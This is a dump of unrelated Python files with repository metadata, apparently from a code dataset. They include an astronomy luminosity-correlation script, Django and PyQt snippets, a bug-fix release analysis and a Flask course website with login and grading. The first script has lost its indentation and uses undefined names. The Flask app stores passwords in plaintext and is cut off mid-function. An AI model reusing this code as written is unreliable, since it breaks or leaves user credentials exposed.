conversion_factor = {3: 22, 2: 29} #, 1.3: 35, 0.8: 45} #[mm]:[Jy/K] from http://www.iram.fr/GENERAL/calls/s14/s14.pdf?fbclid=IwAR3_XqJE1cvy86ppQbSpXS1xAJ4F2sUjevWGDx1Nr78-rdNkUIDksY7f3n8
def read_data(filename):
file = open(filename,'r')
data = file.readlines()
file.close()
return data
def write_data(end_filename, data, slope, intercept, pearson, stderr):
file = open(end_filename,'w')
for SMM, CN, HCN in data:
file.write(f'{SMM:10.5} {CN:10.5} {HCN:10.5}\n')
file.write(f'\n slope:{slope:10.5} intercept:{intercept:10.5} stderr:{stderr:10.5} pearson:{pearson:10.5}\n')
file.close()
def create_flux_list(data):
fluxes = []
for i in range(1,len(data)):
line = data[i].split()
previous_line = data[i-1].split()
if line[1] == 'hcn10' and previous_line[1] == 'cn10':
fluxes.append((line[0], float(previous_line[2]), float(line[2]), float(data[i+1].split()[2]))) # source CNflux, HCNflux, CSflux
return fluxes
def plot_correlation(x, y, a, b, pearson):
Y = [elem*a+b for elem in x]
fig = plt.figure(1)
ax = fig.add_subplot(111)
ax.set_ylabel(r"$L_{\mathrm{CN}}$ [L$_\odot$]")
ax.set_xlabel(r"$L_{\mathrm{HCN}}$ [L$_\odot$]")
major_ticks_x = np.arange(-1, 2, 0.5)
major_ticks_y = np.arange(-6, -5, 0.1)
ax.set_xticks(major_ticks_x)
ax.set_yticks(major_ticks_y)
sources_list=['SMM8','SMM5','SMM2','SMM4','SMM12','SMM10','SMM3','SMM9','SMM6','SMM1'] #Lbol increasing
for i in range(len(sources_list)):
if i ==4:
ax.text(x[i]+0.02, y[i]-0.02, 'SMM12')
elif i == 0:
ax.text(x[i]+0.02, y[i], 'SMM8')
else:
ax.text(x[i]+0.02, y[i], sources_list[i])
ax.text(0.05, 1.05, 'Pearson coefficient = '+str(pearson) , transform=ax.transAxes, fontsize=14,
verticalalignment='bottom')
plt.plot(x, y, 'r.', ms=4.9)
plt.plot(x, Y, 'k-', linewidth=0.5)
plt.savefig('CN_HCN_correlation_log', format='eps')
plt.close()
def calculate_pearson(x, y):
pearson = stat.pearsonr(x, y)
print(pearson)
return pearson[0]
def fit_linear_regression(x, y):
slope, intercept, r_value, p_value, stderr = stat.linregress(x,y)
print(slope, intercept, r_value, p_value, stderr)
return slope, intercept, stderr
def sort_points(list_to_sort, other_list):
if len(list_to_sort) != len(other_list):
raise
merged_list = [(list_to_sort[i], other_list[i]) for i in range(len(list_to_sort))]
sorted_list = sorted(merged_list, key=lambda x: x[0])
return [elem[0] for elem in sorted_list], [elem[1] for elem in sorted_list]
def calculate_Lbol_for_molecule(fluxes, mol, JytoK):
Lbol_source = []
for line in fluxes:
new_line = []
for i in range(1,len(line)):
flux_Jy_kms = line[i]*JytoK # 2k/lambda^2 * T_mb [Jy*km/s]
flux_Jy_Hz = flux_Jy_kms/((c/1000.)/freq[mol]) # F [Jy*Hz] = F [Jy*km/s] / lambda[km]
L_bol = (1e-26*flux_Jy_Hz*4.0*m.pi*(DIST*3.0857e16)**2)/L_sun
print(L_bol)
new_line.append(L_bol)
Lbol_source.append(new_line)
return Lbol_source
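
# Worked example (illustrative numbers): a CN flux of 10 K km/s times a
# conversion factor of ~24.5 Jy/K gives ~245 Jy km/s; dividing by the CN line
# wavelength in km (~2.64e-6 km) yields ~9.3e7 Jy Hz, and scaling by
# 1e-26 * 4*pi*(436 pc)^2 / L_sun gives ~5.5e-6 L_sun, i.e. about -5.3 in
# the log units used on the plot axes above.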
def estimate_conversion_factor(freq):
wavelength = c*1000/freq #in mm
mms = [elem for elem in conversion_factor.keys()]
Jy_K = [elem for elem in conversion_factor.values()]
a, b, r, p, stdev = regr(mms, Jy_K)
y = a * wavelength + b
return y
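
# Illustrative check (values assumed): CN(1-0) at ~113.49 GHz corresponds to
# a wavelength of ~2.64 mm, so the linear fit through the {3 mm: 22 Jy/K,
# 2 mm: 29 Jy/K} points above returns roughly 24.5 Jy/K.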
def make_log_list(old_list):
new_list = []
for elem in old_list:
if elem != 0:
new_list.append(m.log10(elem))
else:
new_list.append(elem)
return new_list
def main():
data = read_data('SMM_fluxes')
fluxes = create_flux_list(data)
JytoK_CN = estimate_conversion_factor(freq['CN'])
JytoK_HCN = estimate_conversion_factor(freq['HCN'])
Lbol_CN = calculate_Lbol_for_molecule(fluxes, 'CN', JytoK_CN)
Lbol_HCN = calculate_Lbol_for_molecule(fluxes, 'HCN', JytoK_HCN)
Lbol = [78.7, 4.1, 6.9, 4.4, 3.7, 43.1, 0.2, 10.3, 6.2, 5.7]
Tbol = [35, 31, 35, 77, 151, 532, 15, 35, 83, 97]
    # `Lbol_source` is not defined anywhere above; the per-molecule luminosity
    # tables just computed are assumed to be the intended source here.
    CN_list = [point[0] for point in Lbol_CN]
    HCN_list = [point[1] for point in Lbol_HCN]
    CS_list = [point[2] for point in Lbol_HCN]
Lbol, CN_list = sort_points(Lbol, CN_list)
Lbol = make_log_list(Lbol)
CN_list = make_log_list(CN_list)
a, b, stderr = fit_linear_regression(Lbol, CN_list)
pearson = calculate_pearson(Lbol, CN_list)
plot_correlation(Lbol, CN_list, a, b, pearson)
#write_data('CN_Lbol_corr.txt', fluxes, a, b, pearson, stderr)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
e75b0875409a78b37d8d31a235ea8c260247ca24 | a702762648baeaaf48e2fe623707caf484d721ce | /TenniSoda/wsgi.py | 5b9f89108963219648b07e326451a95fa8f1f873 | [] | no_license | Championzb/TenniSoda | f0414d4d50e5c0bf766e7933390c8c9c433e90e6 | 057b6d6ea0782eb761aac10e6f7f94620476807d | refs/heads/master | 2020-05-31T05:49:11.007701 | 2015-03-27T16:54:32 | 2015-03-27T16:54:32 | 20,361,046 | 0 | 0 | null | 2014-06-21T02:42:13 | 2014-05-31T17:25:56 | CSS | UTF-8 | Python | false | false | 645 | py | """
WSGI config for TenniSoda project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "TenniSoda.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
"""
import os
import sys
os.environ['DJANGO_SETTINGS_MODULE'] = 'TenniSoda.settings'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
path = '/root/TenniSoda'
if path not in sys.path:
sys.path.append(path)
"""
| [
"[email protected]"
] | |
56d35c8be025ff1d54f1f4ad818ab5e623008fe1 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_herding.py | 2aa0cb990f8008f89f85be0e917a16355fd6d51e | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py |
# class header
class _HERDING():
def __init__(self,):
self.name = "HERDING"
        self.definitions = 'herd'  # quoted; the original bare name would raise a NameError
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['herd']
| [
"[email protected]"
] | |
06e974b302ffa4d3cb39f52e50406a79d78f7264 | 505dc7e998f921177b61cc88a1fc7ec71d98b7de | /main/migrations/0002_post_title_tag.py | e07c5c311e18975c1e4f4c6aa3ebbfefaa7927ba | [] | no_license | Jerome4914/Blog | f2a64cf43ea7f3caf816d744f9bb8356ef6f1822 | 32aa532351d2b6773f14f713b6dbf9ae328ad26a | refs/heads/main | 2023-08-06T15:44:08.259064 | 2021-10-08T07:17:22 | 2021-10-08T07:17:22 | 401,833,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | # Generated by Django 2.2 on 2021-08-31 17:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='post',
name='title_tag',
field=models.CharField(default='My Blog', max_length=255),
),
]
| [
"[email protected]"
] | |
ab6114c3cbc6fcae25a05ce741d018a20a657aba | eaf319e5d25a9bbf9ce9bb9ff596efda7e0b1ac5 | /deviceselectwidget.py | ca3592aeca69218454512895becb6d9b83e840af | [] | no_license | igrekus/mult_i1_measure | 4a3e43b99c66e0288bb042ecb47907c60aa3c224 | bcee674c0cfcb5f7de02dcf5d804b7a5be3449aa | refs/heads/master | 2020-05-24T01:04:14.936612 | 2019-08-19T10:38:51 | 2019-08-19T10:38:51 | 187,028,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from PyQt5.QtCore import pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QWidget, QVBoxLayout, QRadioButton, QButtonGroup, QLabel, QComboBox
class DeviceSelectWidget(QWidget):
selectedChanged = pyqtSignal(str)
def __init__(self, parent=None, params=None):
super().__init__(parent=parent)
self._layout = QVBoxLayout()
self._label = QLabel('Прибор')
self._combo = QComboBox()
for i, label in enumerate(params.keys()):
self._combo.addItem(label)
self._layout.addWidget(self._label)
self._layout.addWidget(self._combo)
self.setLayout(self._layout)
self._combo.setCurrentIndex(0)
self._combo.currentIndexChanged[str].connect(self.on_indexChanged)
self._enabled = True
@property
def selected(self):
return self._combo.currentText()
@pyqtSlot(str)
def on_indexChanged(self, text):
self.selectedChanged.emit(text)
@property
def enabled(self):
return self._enabled
@enabled.setter
def enabled(self, value: bool):
self._enabled = value
self._combo.setEnabled(value)
| [
"[email protected]"
] | |
0b3748a7100aa612a78fc96bc481e5e90e940cf3 | 78518b65b6823ac42b20515ae7716ada4b59db3d | /手写代码/第17章 智能算法/17_3.py | 33d3e08f23e41d7ca1f5669656876126df991ba9 | [] | no_license | YunHao-Von/Mathematical-Modeling | 70d6ad8f2f543751883afdc85aa19b1c80a106a0 | 4fe153453cccb4b474166c104e08d13ed72bc5ac | refs/heads/master | 2023-03-02T23:16:40.839865 | 2021-02-15T09:52:24 | 2021-02-15T09:52:24 | 339,029,227 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 326 | py | from sklearn.linear_model import Perceptron
import numpy as np
x0 = np.array([
[-0.5, -0.5, 0.3, 0.3],
[-0.5, 0.5, -0.5, 1.0]
]).T
y0 = np.array([1, 1, 0, 0])
md = Perceptron(tol=1e-3)
md.fit(x0, y0)
print(md.coef_, md.intercept_)
print(md.score(x0, y0))
print("预测值为:\n", md.predict(np.array([[-0.5, 0.2]])))
| [
"[email protected]"
] | |
16334c323a1baf3cb4ef5e1fb4385aa513405fd9 | 30abe88a996722bd714cbae02d2b5403df0f6746 | /scripts_new/6_determine_target_releases.py | f29b708b374153ed22e2b36963e66f15f3d69a2a | [] | no_license | KilbyBaron/Not-All-Bugs-Are-The-Same | 5a293c64062db86982f0f63ab27eb3c1666338c8 | 5b30826407452d5c9796b4c0e4a2337bb95b112e | refs/heads/master | 2020-08-18T21:38:09.087774 | 2020-01-03T17:12:29 | 2020-01-03T17:12:29 | 215,835,380 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,297 | py | import os
import pandas as pd
import numpy as np
import re
import time
import datetime
import math
"""
This script locates the 3 consecutive minor releases of each project
with the most post release bug fixing commits.
"""
def count_pre_post():
version_data = pd.read_csv(dir+"/intermediate_files/release_dates/version_data.csv")
version_data['date'] = pd.to_datetime(version_data['date'])
bfcs = pd.read_csv(dir+"/intermediate_files/bugfixingcommits.csv")
#Make sure all time columns are of the correct type
#bfcs['committerTime'] = pd.to_numeric(bfcs['BFC_date'], errors='coerce')
#bfcs = bfcs[pd.notnull(bfcs['BFC_date'])]
#bfcs['committerTime'] = pd.to_datetime(bfcs['BFC_date'], unit='s')
bfcs['BFC_date'] = pd.to_datetime(bfcs['BFC_date'])
count = {}
for bfc_index, bfc_row in bfcs.iterrows():
if not np.isnan(bfc_row['major']):
proj = bfc_row['project'].lower()
major = int(bfc_row['major'])
minor = int(bfc_row['minor'])
rel = str(major)+"."+str(minor)
commit_date = pd.to_datetime(bfc_row['BFC_date'],unit='s')
vd_row = version_data.loc[(version_data['project'] == proj) & (version_data['major'] == major) & (version_data['minor'] == minor)]
if vd_row.shape[0] > 0:
rel_date = vd_row['date'].iloc[0]
pre = 0
if rel_date > commit_date:
pre = 1
post = 1-pre
if proj in count:
if rel in count[proj]:
count[proj][rel]["pre"] += pre
count[proj][rel]["post"] += post
else:
count[proj][rel] = {"pre":pre, "post":post}
else:
count[proj] = {rel:{"pre":pre, "post":post}}
#Create empty df and fill it
df = pd.DataFrame(columns=['project','release','major','minor','pre','post'])
for k1 in count:
for k2 in count[k1]:
df = df.append({
'project': k1,
'release': k2,
'major': k2.split(".")[0],
'minor' : k2.split(".")[1],
'pre': count[k1][k2]["pre"],
'post': count[k1][k2]["post"]
},ignore_index=True)
return df
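
# Each row of the returned frame counts pre-/post-release bug-fixing commits
# for one (project, minor release), e.g. (illustrative values only):
# project='felix', release='1.2', major=1, minor=2, pre=40, post=25.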
#Working directory
dir = os.getcwd()+"/.."
os.chdir(dir)
#new df to fill with target releases
targets = pd.DataFrame(columns=['project','release','major','minor', 'pre', 'post'])
#count the number of commits for each release
df = count_pre_post()
print(sum(df['post'].tolist()))
df['minor'] = df['minor'].astype(int)
df['major'] = df['major'].astype(int)
print(df.loc[df['project']=='felix'])
#Import version data to find exact release numbers
version_data = pd.read_csv(dir+"/intermediate_files/release_dates/version_data.csv")
#Find the 3 consecutive releases in each project with the most pre-release bfcs
projects = ["accumulo","bookkeeper","camel","cassandra","cxf","derby","hive","openjpa","pig","wicket"] #Felix intentionally omitted, added seperately afterward
for project in projects:
#target will hold the major/minor of the first target release
target = None
most_post_commits = 0
#Get a df of the commit counts for the current project
p_df = df.loc[df['project'] == project]
#Loop through a list of all major versions
major_versions = set(p_df['major'].tolist())
for maj in major_versions:
#Loop through a list of all minor versions in the current major version
pv_df = p_df.loc[p_df['major'] == maj]
minor_versions = set(pv_df['minor'].tolist())
for minor in minor_versions:
#If there exist 3 consecutive minor releases starting from the current minor release,
#and the sum of post-release bfcs is the most so far, save the major/minor
if minor+1 in minor_versions and minor+2 in minor_versions:
c1 = pv_df.loc[pv_df['minor'] == minor].iloc[0]['post']
c2 = pv_df.loc[pv_df['minor'] == minor+1].iloc[0]['post']
c3 = pv_df.loc[pv_df['minor'] == minor+2].iloc[0]['post']
if most_post_commits < c1+c2+c3:
most_post_commits = c1+c2+c3
target = {'major':maj,'minor':minor}
#Add the 3 target releases to the target dataframe
for x in range(3):
if target == None:
print(project,"targets not found!")
else:
p_row = p_df.loc[(p_df['major'] == target['major']) & (p_df['minor'] == target['minor']+x)].iloc[0]
v = version_data.loc[(version_data['major'] == target['major']) & (version_data["minor"] == target['minor']+x)].iloc[0]['release']
targets = targets.append({'project':project,'release':v,'major':target['major'],'minor':target['minor']+x, 'pre':p_row['pre'], 'post':p_row['post']},ignore_index=True)
#Set felix afterward since we had to decide the releases manually
targets = targets.append(df.loc[(df['project']=='felix')&(df['minor']!=2)])
targets.to_csv(dir+"/intermediate_files/target_releases.csv", index=False)
| [
"[email protected]"
] | |
8389770d0730504c914a4e099e8054f4ee6b6b14 | 98c5349213b5705f1870e506f3ab729dbefb55a9 | /app.py | 08335e0bca452a1057e24a468a4ff3b43b4d6b92 | [] | no_license | aritroper/TheOnionPeeler | 3810adc31747915f3b2b9ab1f02081aa5d88de68 | 55f2deaa5e9333f60479c31deb6e6db80890e53e | refs/heads/master | 2020-05-17T11:52:51.175166 | 2019-04-26T21:45:15 | 2019-04-26T21:45:15 | 182,567,210 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,442 | py | import praw
from random import shuffle, randint
from flask import *
app = Flask(__name__)
# Updates for article in question
is_true = True
s_link = ""
@app.route("/", methods=["GET", "POST"])
def index():
return render_template("index.html", headline=generate_headline())
@app.route("/guess", methods=["GET", "POST"])
def guess():
print("app.py: " + str(is_true))
print("app.py: " + s_link)
    return jsonify(is_true=is_true, link=s_link)
# Reddit instance
reddit = praw.Reddit(client_id = 'M4K5s4jT-5OV1g',
client_secret = '9MfkJKY5Wt2VkrMBzdOkojEGNJ8',
user_agent = 'Onion Peeler')
realNews = []
fakeNews = []
# Fetches 100 of the hottest r/notheonion and r/theonion posts
def update_news() :
global realNews
global fakeNews
# Fetch real news from r/nottheonion
realNews = list(reddit.subreddit('nottheonion').hot(limit = 100))
# Fetch fake news from r/theonion
fakeNews = list(reddit.subreddit('theonion').hot(limit = 100))
# Pick a random headline, record in the module globals whether it is real
# (and its source link), and return the headline text
def generate_headline():
global is_true
global s_link
update_news()
shuffle(realNews)
shuffle(fakeNews)
r = randint(1, 2)
# Generate real news.
if r == 1:
is_true = True
s_link = realNews[0].url
return realNews[0].title.upper()
# Generate fake news.
else:
is_true = False
s_link = fakeNews[0].url
return fakeNews[0].title.upper()
| [
"[email protected]"
] | |
8eced85c27eae6bed3281d1ca966cb978c8f304a | a3aaa7cbfb658218456be1d6e4e5b6060c454a87 | /util.py | c84f4aaf1780bfd780bd7161617eda33b7bc6577 | [] | no_license | nick9914/machine_learning_for_trading | 825ad0ab017546f92b895fe91a13343356f63932 | 9fa50a917111def922cdc67eccef16f9f5d3159b | refs/heads/master | 2020-04-11T06:04:49.095902 | 2019-05-06T03:38:17 | 2019-05-06T03:38:17 | 124,329,260 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,822 | py | """MLT: Utility code.
Copyright 2017, Georgia Tech Research Corporation
Atlanta, Georgia 30332-0415
All Rights Reserved
"""
import os
import pandas as pd
def symbol_to_path(symbol, base_dir=None):
"""Return CSV file path given ticker symbol."""
if base_dir is None:
base_dir = os.environ.get("MARKET_DATA_DIR", '../data/')
return os.path.join(base_dir, "{}.csv".format(str(symbol)))
def get_data(symbols, dates, addSPY=True, colname = 'Adj Close', dropNonTradingSPY=True):
"""Read stock data (adjusted close) for given symbols from CSV files."""
df = pd.DataFrame(index=dates)
if addSPY and 'SPY' not in symbols: # add SPY for reference, if absent
symbols = ['SPY'] + symbols
for symbol in symbols:
df_temp = pd.read_csv(symbol_to_path(symbol), index_col='Date',
parse_dates=True, usecols=['Date', colname], na_values=['nan'])
df_temp = df_temp.rename(columns={colname: symbol})
df = df.join(df_temp)
if dropNonTradingSPY and symbol == 'SPY': # drop dates SPY did not trade
df = df.dropna(subset=["SPY"])
return df
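# Example usage (hypothetical symbols and dates; assumes matching CSVs exist under MARKET_DATA_DIR):
#   dates = pd.date_range('2010-01-01', '2010-12-31')
#   prices = get_data(['GOOG', 'IBM'], dates)
#   plot_data(prices)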
def plot_data(df, title="Stock prices", xlabel="Date", ylabel="Price"):
    """Plot stock prices with a custom title and meaningful axis labels."""
    import matplotlib.pyplot as plt
ax = df.plot(title=title, fontsize=12)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
plt.show()
def get_orders_data_file(basefilename):
return open(os.path.join(os.environ.get("ORDERS_DATA_DIR",'orders/'),basefilename))
def get_learner_data_file(basefilename):
return open(os.path.join(os.environ.get("LEARNER_DATA_DIR",'Data/'),basefilename),'r')
def get_robot_world_file(basefilename):
return open(os.path.join(os.environ.get("ROBOT_WORLDS_DIR",'testworlds/'),basefilename))
| [
"[email protected]"
] | |
10fdba63f4eb65b2041a156081fd3b9245f73110 | c270323cb953e917b06601791fa71ab093f86df8 | /app.py | 12d629a239f4e03002fd0f9caaa4aa74fc743bd2 | [] | no_license | masheilmir/CourseWebsite | 6017d85c30ee688036585d2c4719d79498a1afc1 | e56f7d025dba42ae2576cf13f604d8aafd39276f | refs/heads/master | 2022-12-12T10:23:22.104005 | 2020-09-08T00:57:05 | 2020-09-08T00:57:05 | 256,661,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,608 | py | from flask import Flask, render_template, request, g, flash, redirect, session, abort, url_for, escape, Markup
import sqlite3
import os
DATABASE = './database.db'
# the function get_db is taken from here:
# https://flask.palletsprojects.com/en/1.1.x/patterns/sqlite3/
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
# the function make_dicts is taken from here:
# https://flask.palletsprojects.com/en/1.1.x/patterns/sqlite3/
def make_dicts(cursor, row):
return dict((cursor.description[idx][0], value)
for idx, value in enumerate(row))
# the function query_db is taken from here:
# https://flask.palletsprojects.com/en/1.1.x/patterns/sqlite3/
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
app = Flask(__name__)
app.secret_key = os.urandom(12)
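# Random per-process secret key: existing sessions are invalidated on every restart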
# the function close_connection is taken from here:
# https://flask.palletsprojects.com/en/1.1.x/patterns/sqlite3/
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
@app.route('/')
def medium():
if not session.get('logged_in'):
return render_template('loginUser.html')
else:
return redirect(url_for('showHome'))
@app.route('/login', methods=['GET', 'POST'])
def user_login():
if request.method == "POST":
return validateUser()
else:
return render_template('loginUser.html')
@app.route('/logout')
def user_logout():
session['logged_in'] = False
session['student'] = False
session['instructor'] = False
return medium()
@app.route('/registerPortal')
def showRegister():
if not session.get('logged_in'):
return render_template('registerUser.html')
return redirect(url_for('showHome'))
@app.route('/registerAction', methods=['POST'])
def registerUser():
if not session.get('logged_in'):
userFname = request.form['firstname']
username = request.form['username']
password = request.form['password']
userType = request.form.get('usertype')
db = get_db()
db.row_factory = make_dicts
sUserExist = query_db("SELECT username FROM Student WHERE username = ?", [
username], one=True)
iUserExist = query_db("SELECT username FROM Instructor WHERE username = ?", [
username], one=True)
if (sUserExist is not None) or (iUserExist is not None):
flash(Markup(
"User already exists. Are you sure <i>this</i> isn't your account?"))
return redirect(url_for('showRegister'))
else:
if (userFname == '') or (username == '') or (password == '') or (userType == 'Select a user type'):
flash("You forgot to input first name/username/password/user type")
return redirect(url_for('showRegister'))
elif (userType == 'student') and (('instructor' in username) or ('instructor' in password)):
flash("You shouldn't be logging into this type of user!")
return redirect(url_for('showRegister'))
elif (userType == 'instructor') and (('student' in username) or ('student' in password)):
flash("You shouldn't be logging into this type of user!")
return redirect(url_for('showRegister'))
elif userType == 'student':
query_db("INSERT INTO Student (username, password, fname) VALUES (?, ?, ?)", [
username, password, userFname])
db.commit()
db.close()
flash("You've successfully created an account.")
return redirect(url_for('showRegister'))
else:
query_db("INSERT INTO Instructor (username, password, fname) VALUES (?, ?, ?)", [
username, password, userFname])
db.commit()
db.close()
flash("You've successfully created an account.")
return redirect(url_for('showRegister'))
return redirect(url_for('showHome'))
@app.route('/validateUser', methods=['POST'])
def validateUser():
username = request.form['username']
password = request.form['password']
db = get_db()
db.row_factory = make_dicts
studentUser = query_db("SELECT username FROM Student WHERE username = ? AND password = ?", [
username, password], one=True)
instructorUser = query_db("SELECT username FROM Instructor WHERE username = ? AND password = ?", [
username, password], one=True)
db.close()
if studentUser is None and instructorUser is None:
flash('Incorrect information provided, please try a different username/passsword.')
session['logged_in'] = False
return redirect(url_for('medium'))
elif studentUser is not None:
session['user'] = studentUser['username']
session['logged_in'] = True
session['student'] = True
return redirect(url_for('medium'))
elif instructorUser is not None:
session['user'] = instructorUser['username']
session['logged_in'] = True
session['instructor'] = True
return redirect(url_for('medium'))
@app.route('/home')
def showHome():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
return render_template('index.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
return render_template('index.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/lectures')
def showLectures():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
return render_template('lectures.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
return render_template('lectures.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/assignments')
def showAssignments():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
return render_template('Assignments.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
return render_template('Assignments.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/resources')
def showResources():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
return render_template('resources.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
return render_template('resources.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/labs')
def showLabs():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
return render_template('labs.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
return render_template('labs.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/tests')
def showTests():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
db.close()
return render_template('Tests.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
db.close()
return render_template('Tests.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/grades')
def getGrades():
if session.get('logged_in'):
username = session.get('user')
sBoolean = session.get('student')
iBoolean = session.get('instructor')
db = get_db()
db.row_factory = make_dicts
if sBoolean:
Sid = query_db("SELECT Sid FROM Student WHERE username = ?", [
username], one=True)
sGrades = query_db(
"SELECT mark, eval FROM Marks WHERE Sid = ?", [Sid['Sid']], one=False)
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
evaluations = query_db("SELECT DISTINCT eval FROM Marks")
db.close()
if sGrades is None:
    return render_template('grades.html')
return render_template('grades.html', sGrades=sGrades, user=name['fname'], evaluation=evaluations)
elif iBoolean:
Iid = query_db("SELECT Iid FROM Instructor WHERE username = ?", [
username], one=True)
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
evaluations = query_db("SELECT eval, Sid, mark FROM Marks")
remarks = query_db("SELECT Sid, eval, reason FROM Remark")
db.close()
if evaluations is None:
return render_template('grades.html')
return render_template('grades.html', user=name['fname'], evaluation=evaluations, remarks=remarks)
else:
return redirect(url_for('medium'))
@app.route('/remarkRequest', methods=['POST'])
def remarkRequest():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
assignment = request.form.get('aName')
reason = request.form.get('reason')
if (assignment == 'Select an evaluation') or (reason == ''):
flash('Please select a valid evaluation/enter a valid reason.')
return redirect(url_for('getGrades'))
else:
db = get_db()
db.row_factory = make_dicts
Sid = query_db("SELECT Sid FROM Student WHERE username = ?", [
username], one=True)
# insert into db
query_db("INSERT INTO Remark (Sid, reason, eval) VALUES (?, ?, ?)", [
Sid['Sid'], reason, assignment])
db.commit()
db.close()
flash("Anonymous feedback sent.")
return redirect("/grades")
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
db.close()
return redirect("/grades")
else:
return redirect(url_for('medium'))
@app.route('/enterGrades', methods=['POST'])
def enterGrades():
if session.get('logged_in') and session.get('instructor'):
username = session.get('user')
stNum = request.form.get('sNum')
assignment = request.form.get('aName')
grade = request.form.get('pGrade')
if (assignment == '') or (stNum == '') or (grade == ''):
flash('Please ensure all fields have been completed.')
return redirect(url_for('getGrades'))
else:
db = get_db()
db.row_factory = make_dicts
Iid = query_db("SELECT Iid FROM Instructor WHERE username = ?", [
username], one=True)
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
# insert into db
query_db("INSERT INTO Marks (Sid, mark, eval, Iid) VALUES (?, ?, ?, ?)", [
int(stNum), float(grade), assignment, Iid['Iid']])
db.commit()
db.close()
flash('Grade added.')
return redirect("/grades")
else:
return redirect(url_for('medium'))
@app.route('/feedbacks')
def showFeedbacks():
if session.get('logged_in'):
if session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
iName = query_db("SELECT fname FROM Instructor", one=False)
return render_template('feedbacks.html', user=name['fname'], iName=iName)
elif session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
iFeedback = query_db(
"SELECT feedback FROM Feedbacks WHERE instructor = ?", [name['fname']], one=False)
db.close()
return render_template('feedbacks.html', feedbacks=iFeedback, user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/feedbackForm', methods=['POST'])
def createFeedbacks():
if session.get('logged_in'):
if session.get('student'):
